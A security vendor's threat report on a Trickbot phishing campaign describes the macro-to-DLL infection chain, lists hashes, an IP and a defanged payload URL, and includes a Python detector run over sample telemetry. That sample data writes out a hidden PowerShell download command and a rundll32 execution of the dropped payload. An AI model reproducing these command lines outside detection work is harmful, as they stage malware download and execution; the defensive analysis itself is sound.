Trickbot malware has been with us since 2016. It started as a banking trojan, targeting financial services and their users to steal banking data. Over the years, however, it has evolved into sophisticated, multi-modular malware that can infect both Windows and Linux systems.

Trickbot malware is believed to be affiliated with Conti ransomware attacks, as the ransomware was installed after networks were compromised by Trickbot. Other malware from the Trickbot gang, such as BazarLoader, has been used to deploy Ryuk ransomware against Volue, K12, The University of Vermont Health Network, and many others. Trickbot malware usually spreads through phishing campaigns, using embedded URLs or infected attachments.

Trickbot's roots have been traced to Russia-based threat actors. One suspected gang member was recently arrested in South Korea. In addition, a Latvian national was charged by the U.S. Department of Justice for helping the Trickbot gang develop a platform for a new ransomware operation. Despite the arrests, the gang has continued to operate as normal.

Yesterday, the Malwarebytes Threat Intelligence team tweeted that they had spotted a new phishing campaign that infects victims with Trickbot malware. It employs a recognizable attack chain:

  1. The victim opens a malicious .docm file that is "protected"; macros must be enabled to "unlock" it:

Figure 1 Malicious .docm Attachment

  2. Once the victim enables macro execution, a randomly named .bat file is dropped into the C:\ProgramData directory:

Figure 2 .bat File Drop

  3. The Trickbot payload is downloaded from the attacker's server using PowerShell and written to C:\ProgramData as a .dll file.
  4. WinWord executes the malicious DLL using rundll32.exe (MITRE ATT&CK technique T1218.011).
  5. The malicious DLL is injected into svchost.exe (MITRE ATT&CK technique T1055.012).

Figure 3 Execution Flow
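The chain above as a defender would look for it in endpoint telemetry: an added Python example, not code from Minerva or the original post, that runs four detection rules over constructed Sysmon-style events (the .bat/.dll names and the download URL are hypothetical placeholders) and ignores the benign rundll32 and svchost activity mixed in.

```python
import re

# Constructed sample telemetry modelled on the chain above (not real logs).
# "pc" = process-creation event, "rt" = remote-thread event (Sysmon-style).
# File names and the download URL are hypothetical placeholders.
SAMPLE_EVENTS = [
    {"type": "pc", "parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\ProgramData\kq8s1.bat"'},
    {"type": "pc", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell -w hidden iwr http://placeholder.invalid/i.png -OutFile C:\ProgramData\kq8s1.dll"},
    {"type": "pc", "parent": "WINWORD.EXE", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\kq8s1.dll,Start"},
    {"type": "rt", "source": "rundll32.exe", "target": "svchost.exe"},
    # Benign noise that must not alert: rundll32 loading a system DLL, normal svchost start.
    {"type": "pc", "parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "pc", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "rundll32.exe", "wscript.exe", "mshta.exe"}
# Executable payloads staged under C:\ProgramData (stages 2 and 3 of the chain).
PROGRAMDATA_PAYLOAD = re.compile(r"c:\\programdata\\[^\\\s\"']+\.(?:bat|dll)", re.I)
SYSTEM_DIR = re.compile(r"c:\\windows\\(?:system32|syswow64)\\", re.I)

def detect(events):
    """Return (rule, detail) tuples for events matching stages of the chain."""
    hits = []
    for e in events:
        if e["type"] == "pc":
            parent, image, cmd = e["parent"].lower(), e["image"].lower(), e["cmdline"]
            if parent in OFFICE and image in LOLBINS:          # macro spawning a LOLBin
                hits.append(("office_spawns_lolbin", f"{parent} -> {image}"))
            m = PROGRAMDATA_PAYLOAD.search(cmd)
            if m:
                hits.append(("programdata_payload", m.group(0)))
            if image == "rundll32.exe" and ".dll" in cmd.lower() and not SYSTEM_DIR.search(cmd):
                hits.append(("rundll32_nonsystem_dll", cmd))  # T1218.011
        elif e["type"] == "rt" and e["target"].lower() == "svchost.exe" \
                and e["source"].lower() not in {"services.exe", "svchost.exe"}:
            hits.append(("svchost_remote_thread", f"{e['source']} -> {e['target']}"))  # T1055.012
    return hits

def stages_seen(events):
    """Distinct rules fired; all four together are strong evidence of the full chain."""
    return sorted({rule for rule, _ in detect(events)})
```

Any single rule can fire on legitimate activity; the value is in correlating several of them on one host within a short window.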

The Trickbot gang is continuously evolving its arsenal by developing new tools and upgrading its existing ones. Our Macro Protection technology prevents the drop and execution of malware belonging to the Trickbot family at its earliest stage, including the execution of the campaign described above:

Figure 4 Trickbot Execution Prevention

Learn more about Minerva Armor and how it can stop ransomware before it starts.

IOCs:

Hashes:

405b918189ab1ba4f756be1e698a7375e2add4ba04c8edc75a83bc58ff526eab

6230ef179a43e13f5c18d8a60dfa2d200a55d2d90db9a264d52753c49f9200ed

IP:

23.227.196[.]84

URL:

http://23.227.196[.]84/images/onlinetools.png

Resources:

https://www.bleepingcomputer.com/news/security/jvckenwood-hit-by-conti-ransomware-claiming-theft-of-15tb-data/

https://www.bleepingcomputer.com/news/security/bazarloader-used-to-deploy-ryuk-ransomware-on-high-value-targets/